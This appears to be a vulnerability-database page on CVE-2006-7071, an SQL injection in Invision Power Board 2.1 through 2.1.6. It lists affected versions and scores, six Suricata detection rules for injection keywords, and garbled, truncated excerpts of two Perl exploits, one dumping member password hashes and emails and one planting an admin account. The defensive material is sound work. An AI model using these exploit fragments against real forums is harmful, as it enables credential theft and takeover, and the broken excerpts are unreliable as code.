CVE-2006-7071
published 2007-03-02CVE-2006-7071: SQL injection vulnerability in classes/class_session.php in Invision Power Board (IPB) 2.1 up to 2.1.6 allows remote attackers to execute arbitrary SQL…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.30%
66.8th percentile
SQL injection vulnerability in classes/class_session.php in Invision Power Board (IPB) 2.1 up to 2.1.6 allows remote attackers to execute arbitrary SQL commands via the CLIENT_IP parameter.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| invision_power_services | invision_power_board | — | — |
| invision_power_services | invision_power_board | — | — |
| invision_power_services | invision_power_board | — | — |
| invision_power_services | invision_power_board | — | — |
| invision_power_services | invision_power_board | — | — |
| invision_power_services | invision_power_board | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2006-7071 [HIGH] ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP UPDATE
ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP UPDATE"; flow:established,to_server; http.uri; content:"/classes/class_session.php?"; nocase; content:"CLIENT_IP="; nocase; content:"UPDATE"; nocase; content:"SET"; nocase; distance:0; reference:cve,CVE-2006-7071; reference:url,www.milw0rm.com/exploits/2010; classtype:web-application-attack; sid:2004802; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre
Suricata
ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2006-7071 [HIGH] ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP ASCII
ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP ASCII"; flow:established,to_server; http.uri; content:"/classes/class_session.php?"; nocase; content:"CLIENT_IP="; nocase; content:"ASCII("; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2006-7071; reference:url,www.milw0rm.com/exploits/2010; classtype:web-application-attack; sid:2004801; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitr
Suricata
ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2006-7071 [HIGH] ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP INSERT
ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP INSERT"; flow:established,to_server; http.uri; content:"/classes/class_session.php?"; nocase; content:"CLIENT_IP="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2006-7071; reference:url,www.milw0rm.com/exploits/2010; classtype:web-application-attack; sid:2004799; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitr
Suricata
ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2006-7071 [HIGH] ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP DELETE
ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP DELETE"; flow:established,to_server; http.uri; content:"/classes/class_session.php?"; nocase; content:"CLIENT_IP="; nocase; content:"DELETE"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2006-7071; reference:url,www.milw0rm.com/exploits/2010; classtype:web-application-attack; sid:2004800; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitr
Suricata
ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP UNION SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2006-7071 [HIGH] ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP UNION SELECT
ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP UNION SELECT"; flow:established,to_server; http.uri; content:"/classes/class_session.php?"; nocase; content:"CLIENT_IP="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2006-7071; reference:url,www.milw0rm.com/exploits/2010; classtype:web-application-attack; sid:2004798; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 202
Suricata
ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2006-7071 [HIGH] ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP SELECT
ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP SELECT"; flow:established,to_server; http.uri; content:"/classes/class_session.php?"; nocase; content:"CLIENT_IP="; nocase; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2006-7071; reference:url,www.milw0rm.com/exploits/2010; classtype:web-application-attack; sid:2004797; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitr
Exploit-DB
Invision Power Board 2.1 < 2.1.6 - SQL Injection (2)
exploitdb·2006-07-18
CVE-2006-7071 Invision Power Board 2.1 < 2.1.6 - SQL Injection (2)
Invision Power Board 2.1 new;
&header();
if (@ARGV ".$server."_result.txt");
for($id = 1; $id 0)
{
$email = $rep;
print RES $id.":".$hash.":".$salt."::".$email."\n";
}
}
}
}
close(RES);
print "[!] Query was successfully perfomed. Results are in txt files\r\n";
&footer();
$ex = ;
sub footer()
{
print "[G] Greets: 1dt.w0lf (rst/ghc)\r\n";
print "[L] Visit: secbun.info | damagelab.org | rst.void.ru\r\n";
}
sub header()
{
print q(
* Invision Power Board 2.1.* Remote SQL Injecton Exploit *
* Based on r57-Advisory#41 by 1dt.w0lf (rst/ghc) *
* Coded by w4g.not null *
* FOR EDUCATIONAL PURPOSES *ONLY* *
);
}
sub info()
{
print q(
[i] Usage: perl w4gipb216.pl [server] [/dir/]
where
|- server - server, where IPB installed without http://
|- /dir/ - dir, where IPB installed or / for no dir
e.g perl w
Exploit-DB
Invision Power Board 2.1 < 2.1.6 - SQL Injection (1)
exploitdb·2006-07-14
CVE-2006-7071 Invision Power Board 2.1 < 2.1.6 - SQL Injection (1)
Invision Power Board 2.1 "r57ipb216gui" );
$mw->geometry ( '420x550' ) ;
$mw->resizable(0,0);
$mw->Label(-text => '!', -font => '{Webdings} 22')->pack();
$mw->Label(-text => 'Invision Power Board 2.1.* '{Verdana} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => '')->pack();
$fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;
$fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;
$url = 'http://server/forum/index.php';
$user_id = '1';
$prefix = 'ibf_';
$table = 'members';
$column = 'member_login_key';
$new_admin_name = 'rstghc';
$new_admin_password = 'rstghc';
$new_admin_email = '[email protected]';
$report = '';
$group = 4;
$curr_user = 0;
$rand_session = &session();
$use_custom_fields = 0;
$custom_fields = 'name1=value1,name2=value2';
$fleft->Label ( -
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2006-07/0249.htmlhttp://rst.void.ru/download/r57ipb216gui.txthttp://secunia.com/advisories/21072http://securityreason.com/securityalert/2325http://www.vupen.com/english/advisories/2006/2810https://exchange.xforce.ibmcloud.com/vulnerabilities/27753https://www.exploit-db.com/exploits/2010http://archives.neohapsis.com/archives/bugtraq/2006-07/0249.htmlhttp://rst.void.ru/download/r57ipb216gui.txthttp://secunia.com/advisories/21072http://securityreason.com/securityalert/2325http://www.vupen.com/english/advisories/2006/2810https://exchange.xforce.ibmcloud.com/vulnerabilities/27753https://www.exploit-db.com/exploits/2010
2007-03-02
Published